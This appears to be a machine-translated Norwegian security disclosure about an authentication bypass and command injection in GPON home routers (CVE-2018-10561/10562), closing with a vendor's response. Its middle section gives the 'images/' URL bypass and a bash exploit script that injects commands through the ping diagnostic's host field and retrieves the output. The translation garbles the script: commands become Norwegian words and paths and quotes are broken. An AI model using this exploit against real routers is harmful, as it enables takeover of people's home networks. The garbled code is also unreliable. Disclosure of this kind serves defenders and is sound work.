Sikkerhetsproblem med kritisk RCE funnet i over en million GPON-hjemme-rutere


To viktige oppdateringer siden denne rapporten ble publisert:

  1. Forskningsteamet vårt opprettet en oppdatering som kan hjelpe effektive brukere. Sjekk det her
  2. DASAN Zhone Solutions sendte oss sin kommentar til rapporten. Vi legger ved den “som den er” på slutten av denne siden

Oversikt:

Vi gjennomførte en omfattende vurdering av en rekke GPON-hjemme-rutere. Mange rutere bruker i dag GPON internett, og vi fant en måte å omgå all autentisering på enhetene (CVE-2018-10561). Med denne autentiseringsomgangen, vi kunne også avdekke en annen sårbarhet for kommandoinjeksjon (CVE-2018-10562) og utfør kommandoer på enheten.

Utnyttelse:

Under vår analyse av GPON firmwares, fant vi to forskjellige kritiske sårbarheter (CVE-2018-10561 & CVE-2018-10562) som kan kombinere tillate fullstendig kontroll på enheten og derfor nettverket. Den første sårbarheten utnytter autentiseringsmekanismen til enheten som har en feil. Denne feilen gjør at enhver angriper kan omgå all autentisering.

Feilen kan bli funnet på HTTP-serverne, som ser etter spesifikke baner når du autentiserer. Dette gjør at angriperen kan omgå autentisering på ethvert sluttpunkt ved hjelp av et enkelt triks.

Ved å legge til bilder / til URL-en, kan angriperen omgå sluttpunktet.

Dette fungerer på både HTML-sider og GponForm /

For eksempel ved å sette inn

/menu.html?images/
eller
/ GponForm / diag_FORM? images /

vi kan administrere enheten.

Mens vi tittet gjennom enhetens funksjonalitet, la vi merke til det diagnostiske endepunktet inneholdt ping- og traceroute-kommandoene. Det trengte ikke mye for å finne ut at kommandoene kan injiseres av vertsparameteren.

Siden ruteren lagrer ping-resultater i / tmp og overfører den til brukeren når brukeren besøker /diag.html, er det ganske enkelt å utføre kommandoer og hente utdataene med sårbarhet for autentiseringsomkjøring.

Vi inkluderer følgende bash-versjon av utnyttingskoden:
#! / Bin / bash

ekko “[+] Sende kommandoen…”
# Vi sender kommandoene med to modi backtick (`) og semikolon (;) fordi forskjellige modeller utløser på forskjellige enheter
curl -k -d “XWebPageName = diag&diag_action = ping&wan_conlist = 0&dest_host = \ `$ 2 \`, $ 2&ipv = 0 ”$ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ Dev / null
ekko “[+] Venter….”
sove 3
ekko “[+] Hente ouput….”
krøll -k $ 1 / diag.html? bilder / 2>/ dev / null | grep ‘diag_result =‘ | sed -e ‘s / \\ n / \ n / g’

Innvirkning:

GPON er en type passivt optisk nettverk som bruker fiberoptikk og er spesielt populært. Når folk bruker GPON, blir ruterne levert av ISP-er. I videoen kan du se det over en million mennesker bruker denne typen nettverksrutere.

Vi testet dette sikkerhetsproblemet på mange tilfeldige GPON-rutere, og sårbarheten ble funnet på dem alle. Fordi så mange mennesker bruker denne typen rutere, dette sikkerhetsproblemet kan føre til et helt nettverkskompromiss.

anbefalinger:

  1. Sjekk om ruteren din bruker GPON-nettverket.
  2. Vær oppmerksom på at GPON-rutere kan hackes og utnyttes.
  3. Snakk med Internett-leverandøren din for å se hva de kan gjøre for å fikse feilen.
  4. Advar vennene dine på Facebook (klikk her for å dele) og Twitter (klikk her for å tweet).

Oppdatering: Uttalelse fra DZS angående utnyttelse av autentisering av bypass

DASAN Zhone Solutions, Inc. har undersøkt nylige medieoppslag om at visse DZS GPON Network Interface Devices (NID), mer kjent som rutere, kan være sårbare for en autentiseringsomkjøringsutnyttelse..

DZS har bestemt at ZNID-GPON-25xx-serien og visse H640series GPON ONT-er, når de opererer på spesifikke programvareutgivelser, er påvirket av dette sikkerhetsproblemet. Ingen innvirkning på tjenesten fra dette sikkerhetsproblemet er hittil rapportert til DZS. Etter en intern undersøkelse har vi bestemt at potensiell innvirkning er mye mer begrenset i omfang enn rapportert av vpnMentor. I følge DZS salgsoppføringer, kombinert med feltdata samlet inn til dags dato, har vi estimert at antall GPON ONT-enheter som kan være potensielt påvirket til å være under 240 000. I tillegg, med tanke på den relative modenheten til produktene i deres livssyklus, tror vi at virkningen er begrenset til enda færre enheter.

Produkthistorie

DZS ZNID-GPON-25xx og visse H640-serien ONT-er, inkludert programvaren som introduserte dette sikkerhetsproblemet, ble utviklet av en OEM-leverandør og solgt på nytt av DZS. De fleste av disse produktene er designet og utgitt for mer enn 9 år siden, og er nå langt forbi sin bærekraftige levetid. Fordi programvarestøttekontrakter ikke lenger tilbys for de fleste av disse produktene, har vi ikke direkte innsikt i det totale antallet enheter som fortsatt brukes aktivt i feltet.

Vedtak

DZS har informert alle kundene som kjøpte disse modellene om sårbarheten. Vi jobber med hver kunde for å hjelpe dem med å vurdere metoder for å løse problemet for enheter som fremdeles kan installeres i feltet. Det vil være opp til hver enkelt kundes skjønn å bestemme seg for hvordan de skal oppfylle betingelsen for deres distribuerte utstyr.

DZSs mål er å sikre at alle dens løsninger oppfyller de høyeste sikkerhetsstandardene i bransjen. Vi omfavner dette, og enhver anledning, til å gjennomgå og kontinuerlig forbedre sikkerhetsdesign og testmetoder.

Brayan Jackson
Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me